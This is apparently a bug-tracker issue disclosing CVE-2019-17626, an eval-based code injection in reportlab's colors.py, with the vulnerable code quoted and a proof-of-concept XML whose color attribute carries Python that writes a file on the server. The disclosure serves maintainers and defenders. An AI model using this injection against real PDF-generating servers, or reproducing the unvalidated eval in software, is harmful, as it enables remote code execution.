eval in colors.py leads to remote code execution

Create issue
Issue #199 new
ravi prakash giri created an issue

Hi there,

I was looking at the source code of colors.py and found one instance where the __call__ of toColor class is evaluating the html color code without any validation. There is a CVE assigned for this issue as well - CVE-2019-17626

elif isStr(arg):
            arg = asNative(arg)
            C = cssParse(arg)
            if C: return C
            if arg in self.extraColorsNS: return self.extraColorsNS[arg]
            C = getAllNamedColors()
            s = arg.lower()
            if s in C: return C[s]
            try:
                return toColor(eval(arg))     <--- Here
            except:

I wrote a PoC and verified the same with the following XML:

#!xml

<myroot>
    <label>hello-world</label>
    <row1>
            <html>
                <span color="open('/tmp/colors_poc.txt','wb').write('hello world!')">abcdef</span>
            </html>
    </row1>
</myroot>

Suppose a web server is using reportlab to allow users to generate pdf of XML docs (the code similar to above), when an input like above is used, the function in colors.py will be called which will trigger the eval sink and hence will create a colors_poc.txt file under tmp directory of the server.

Comments (5)

  1. Log in to comment